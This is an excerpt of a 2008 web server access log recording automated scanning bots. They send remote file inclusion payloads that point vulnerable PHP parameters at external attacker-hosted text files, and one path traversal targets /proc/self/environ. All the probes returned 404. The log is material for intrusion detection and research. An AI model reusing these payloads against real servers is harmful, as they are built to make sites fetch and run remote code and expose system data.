203.104.97.42 - - [05/Sep/2008:00:29:11 -0700] "GET /logs//citywriter/head.php?path=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
203.104.97.42 - - [05/Sep/2008:00:29:11 -0700] "GET //citywriter/head.php?path=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
212.122.200.198 - - [05/Sep/2008:00:30:31 -0700] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
212.122.200.198 - - [05/Sep/2008:00:30:34 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
212.122.200.198 - - [05/Sep/2008:00:30:34 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
212.241.219.38 - - [05/Sep/2008:00:31:42 -0700] "GET /logs/access_080809.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://ascx.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jainvestigation.com"
212.122.200.198 - - [05/Sep/2008:00:31:42 -0700] "GET /logs/access_080816.log/e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
212.241.219.38 - - [05/Sep/2008:00:31:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ascx.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jainvestigation.com"
66.199.244.42 - - [05/Sep/2008:00:31:51 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
217.64.195.220 - - [05/Sep/2008:00:32:19 -0700] "GET /logs/access_080825.log///vwar/backup/errors.php?error=http://www.abd-solutions.de/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.64.195.220 - - [05/Sep/2008:00:32:20 -0700] "GET ///vwar/backup/errors.php?error=http://www.abd-solutions.de/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.64.195.220 - - [05/Sep/2008:00:32:20 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.abd-solutions.de/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
83.246.95.69 - - [05/Sep/2008:00:32:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.trueby.ch/.sys/cr4nk/i??? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
83.246.95.69 - - [05/Sep/2008:00:32:53 -0700] "GET /logs/errors.php?error=http://www.trueby.ch/.sys/cr4nk/i??? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
83.246.95.69 - - [05/Sep/2008:00:32:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "